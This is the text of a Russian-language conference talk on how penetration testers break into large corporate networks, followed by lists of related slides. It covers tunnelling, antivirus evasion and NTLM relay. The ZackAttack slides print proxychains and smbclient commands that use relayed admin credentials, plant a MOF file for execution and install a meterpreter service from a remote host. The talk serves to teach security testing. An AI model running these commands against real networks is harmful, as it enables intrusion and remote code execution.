Истории из жизни. Как взламывают сети крупных организаций.

Dmitry Evteev
Dmitry EvteevResearcher
Истории из жизни. Как взламывают
сети крупных организаций.
Дмитрий Евтеев
Что такое крупная сеть?
- информационная система, в которой > 1.000 пользователей
Архитектура крупной сети предполагает:
• Централизованное управление
• Единый источник идентификаторов
• Единая точка аутентификации и авторизации
• Территориальная распределенность
Введение
Веб-приложения
Интерфейсы администрирования
…и прочий «зоопарк»
DNS, интерфейсы обработки электронных сообщений, FTP,
интерфейсы СУБД, LDAP, VPN/IPSEC, Netbios/SMB, Proxy/Socks, SNMP,
NTP…
Что содержится на периметре
Телеком
На большом количестве сетевых устройств, найдутся такие, где
используются дефолты.
Промышленность
На большом количестве идентификаторов пользователей, найдутся
такие, которые используют слабые пароли к удаленному перебору.
Интересные наблюдения (по отрасли)
Госсектор
Неоправданно высокое внимание к отдельным направлениям
обеспечения ИБ, наравне с отсутствием внимания к ИБ в целом.
Финансовый сектор
Пристальное внимание только к системам, обрабатывающим данные
держателей пластиковых карт, позволяет использовать уязвимости в
смежных системах.
Интересные наблюдения (по отрасли)
Россия
• Linux/Apache/MySQL/PHP (LAMP)
Индия
• Linux/Tomcat/Oracle&DB2/Java
Китай
• Windows/IIS/MSSQL/ASP.NET
Интересные наблюдения (по региону)
Основные этапы проведения атаки
Выявление целей и сбор данных об объектах
исследования
Сокрытиеследов
Поиск и эксплуатация уязвимостей
Сбор данных с новым уровнем доступа
Повышение привилегий
Сбор данных с новым уровнем доступа
Развитие атаки с имеющимися привилегиями
Закрепление своего присутствия
Соблюдение законов
Например: низя читать электронную пошту
Ограниченное время
Минимизация воздействия
Например: низя «убивать» аверов
Отчетность
Иногда требуется протокол всех совершаемых действий…
помимо пятисот страничного технического отчета
Оговорка по пентестам
Nmap, Nessus, etc.
Rapid7 Metasploit Framework
Immunity CANVAS
CORE Impact
SAINTexploit
Другие источники:
• public eq exploit-db.com
• private …
Поиск и эксплуатация уязвимостей
Доставка полезной нагрузки
Обеспечение «транспорта»
Задачи, которые стоят перед атакующим
Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
Обеспечение «транспорта» (сценарий 1)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
История из жизни («транспорт» через proxy)
АРМ аудитора
Интернет
1
2
3
4
5
8
10
12
9
14
1315
16
17
Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
Обеспечение «транспорта» (сценарий 2)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
История из жизни (реакция админа на tsh)
Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://http-tunnel.sourceforge.net/
http://sensepost.com/labs/tools/pentest/reduh
http://sourceforge.net/projects/webtunnel/
Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://http-tunnel.sourceforge.net/
http://sensepost.com/labs/tools/pentest/reduh
http://sourceforge.net/projects/webtunnel/
Обеспечение «транспорта» (сценарий 3)
Веб-сервер (W) Терминальный сервер (R)
Атакующий (H)
http://http-tunnel.sourceforge.net/
http://sensepost.com/labs/tools/pentest/reduh
http://sourceforge.net/projects/webtunnel/
История из жизни («транспорт» и доставка полезной
нагрузки через Lotus Domino)
«Транспорт» может быть разным…
За что я люблю крупные сети
Обход ограничений безопасности
http://devteev.blogspot.ru/2012/10/windows.html
Rapid7 Metasploit Framework :: meterpreter
Immunity CANVAS :: MOSDEF
CORE Impact :: Syscall Proxy Agent
SAINTexploit
Пост-эксплуатация
Как обходятся аверы (1/3)
Как обходятся аверы (2/3)
Как обходятся аверы (3/3)
Как обходятся аверы (3/3)
http://blog.gentilkiwi.com/mimikatz
Первостепенная цель атакующего - IAM / IDM
Но, как часто это бывает…
http://devteev.blogspot.ru/2012/02/drg-8-microsoft.html
Как взламывают сети Microsoft
LM - LAN Manager
NTLM - NT LAN Manager
NTLMv2
Kerberos
Протоколы аутентификации в сетях Microsoft
NTLM аутентификация
http://squirtle.googlecode.com/files/NTLM%20is%20D
ead%20-%20DefCon%2016.pdf
NTLM-Relay
http://webstersprodigy.net/2012/07/22/metasploit-generic-ntlm-relay-module/
Аутентификация по NTLMv1
Альтернатива NTLM-Relay (1/2)
Mark Gamache,
http://markgamache.blogspot.ru/2013/01/ntlm-
challenge-response-is-100-broken.html
Альтернатива NTLM-Relay (1/2)
Mark Gamache,
http://markgamache.blogspot.ru/2013/01/ntlm-
challenge-response-is-100-broken.html
Альтернатива NTLM-Relay (2/2)
http://www.ampliasecurity.com/research/wcefaq.html
Owned in 60 seconds with ZackAttack (1/7)
Zack Fase (@zfasel),
https://github.com/zfasel/ZackAttack
Owned in 60 seconds with ZackAttack (2/7)
HTTP -> SMB NTLM relay
Owned in 60 seconds with ZackAttack (3/7)
Owned in 60 seconds with ZackAttack (4/7)
~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.1/C$
ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > ls
AUTOEXEC.BAT A 0 Mon Jan 28 10:20:37 2013
boot.ini AHS 213 Mon Jan 28 09:53:27 2013
...
~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.2/C$
~# proxychains net rpc user -U"DNPRODUCTIE/admin"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)|DNS-response|: bt is not exist|S-chain|-
<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
admin
IUSR_WAD
IWAM_WAD
krbtgt
...
Owned in 60 seconds with ZackAttack (5/7)
exec over winmgmt
~/mof# proxychains smbclient -U"WGW/ADMIN"%"any" //192.168.1.1/ADMIN$
ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > cd system32/wbem/mof
smb: system32wbemmof> put q.mof
putting file q.mof as system32wbemmofq.mof (1173.8 kb/s) (average 1173.8
kb/s)
smb: system32wbemmof>
респект Вячеславу Егошину @vegoshin
Owned in 60 seconds with ZackAttack (6/7)
exec over metsvc
~# proxychains net rpc service create meterpreter meterpreter
"192.168.1.5testmetsvc.exe service" -U"WGW/ADMIN"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
Successfully created Service: meterpreter
~# proxychains net rpc service start meterpreter -U"WGW/ADMIN"%"any" -S
192.168.1.1
Owned in 60 seconds with ZackAttack (7/7)
Реализация успешного сценария атаки – это как
правило использование больше одной уязвимости
Чем больше по размеру информационная система, тем
больше возможных путей для реализации атак
Вместо заключения: простые истины
Спасибо за внимание!
sdevteev@gmail.com
http://devteev.blogspot.com
https://twitter.com/devteev
1 of 53

More Related Content

What's hot(20)

Услуги PT для банковУслуги PT для банков
Услуги PT для банков
Dmitry Evteev1.7K views
penetest VS. APTpenetest VS. APT
penetest VS. APT
Dmitry Evteev16K views
Доклад SiteSecureДоклад SiteSecure
Доклад SiteSecure
Positive Hack Days235 views
Новые угрозы безопасностиНовые угрозы безопасности
Новые угрозы безопасности
Denis Batrankov, CISSP6.3K views
Application security? Firewall it!Application security? Firewall it!
Application security? Firewall it!
Positive Hack Days519 views
Penetration testing (AS IS)Penetration testing (AS IS)
Penetration testing (AS IS)
Dmitry Evteev1.1K views

Viewers also liked(20)

PT MIFI LabsqlPT MIFI Labsql
PT MIFI Labsql
Dmitry Evteev1.4K views
PT MIFI LabsqlPT MIFI Labsql
PT MIFI Labsql
Dmitry Evteev3.3K views
SIEM для ИТSIEM для ИТ
SIEM для ИТ
Olesya Shelestova759 views
Pentest Report SamplePentest Report Sample
Pentest Report Sample
Training center "Echelon"2.4K views
RuSIEM overview (english version)RuSIEM overview (english version)
RuSIEM overview (english version)
Olesya Shelestova696 views
Recon ng null meet April 2015Recon ng null meet April 2015
Recon ng null meet April 2015
n|u - The Open Security Community921 views
Rc uskovRc uskov
Rc uskov
QratorLabs511 views
пр личная эффективность 2014 07пр личная эффективность 2014 07
пр личная эффективность 2014 07
Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 2700110K views
пр работа с информацией 2014 09пр работа с информацией 2014 09
пр работа с информацией 2014 09
Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 2700128.2K views
Typical Vulnerabilities of E-Banking SystemsTypical Vulnerabilities of E-Banking Systems
Typical Vulnerabilities of E-Banking Systems
Positive Hack Days11.7K views

Similar to Истории из жизни. Как взламывают сети крупных организаций.(20)

Krizhanovsky DdosKrizhanovsky Ddos
Krizhanovsky Ddos
Liudmila Li359 views
Eugene Lisitsky Web SocketsEugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
guest092df8215 views
WAF наше все?!WAF наше все?!
WAF наше все?!
Dmitry Evteev1K views
Pt devteev-risspaPt devteev-risspa
Pt devteev-risspa
yaevents394 views
Get inside stage2 newGet inside stage2 new
Get inside stage2 new
InfoTeCS266 views
S-terra, держи марку!S-terra, держи марку!
S-terra, держи марку!
Компания УЦСБ712 views
Eugene Lisitsky Web SocketsEugene Lisitsky Web Sockets
Eugene Lisitsky Web Sockets
rit20102.2K views
Web socketsWeb sockets
Web sockets
Eugene Lisitsky822 views

Истории из жизни. Как взламывают сети крупных организаций.